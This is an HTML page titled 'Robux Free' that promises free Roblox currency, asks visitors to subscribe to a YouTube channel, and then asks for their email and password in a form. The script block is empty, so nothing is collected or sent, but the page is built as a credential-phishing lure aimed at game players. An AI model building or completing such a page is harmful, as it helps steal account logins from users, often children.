<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Robux Free</title>
  <link rel="stylesheets" href="styles.css">
  <link rel="icon" href="" type="image/"> <!-- add image -->
</head>  
<body>
  <h1 class="title">FREE ROBUX</h1>
  <p>MAKE SURE TO LIKE AND SUBSCIRBE TO</p>
  <a href="https://www.youtube.com/@catloaf498" target="_blank">HERE</a>
  <h2>HOW TO GET FREE ROBUX</h2>
  <ol>
    <li>
      Sub and Like <a href="https://www.youtube.com/@catloaf498" target="_blank">HERE</a>
    </li>
    <li>
      Put your info here:
      <input placeholder="email" id="email">
      <input placeholder="password" id="password">
      <button onclick="enter()">ENTER</button>
    </li>
  </ol>
  <script>
    
  </script>
</body>
</html>
